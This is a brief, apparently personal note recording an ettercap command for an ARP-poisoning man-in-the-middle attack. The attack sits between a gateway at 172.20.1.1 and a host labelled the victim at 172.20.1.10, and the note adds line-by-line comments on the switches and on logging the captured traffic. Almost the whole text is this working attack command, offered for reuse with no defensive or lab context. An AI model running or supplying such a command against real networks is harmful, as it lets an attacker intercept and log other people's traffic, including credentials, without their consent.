ettercap mitm gateway attack
Long time i didn’t sniff with ettercap, so i typed here an example command :
ettercap -T -m myVictim.log -M arp:remote /172.20.1.1/ /172.20.1.10/
# -T switch tells ettercap to use Text user interface
# -m selects and simple log file (output in the gui interface, not the ECI version)
# -M selects Man-in-the-middle attack
# arp:remote are option for MITM method
# 172.20.1.10 is the victim
# 172.20.1.1 is the gateway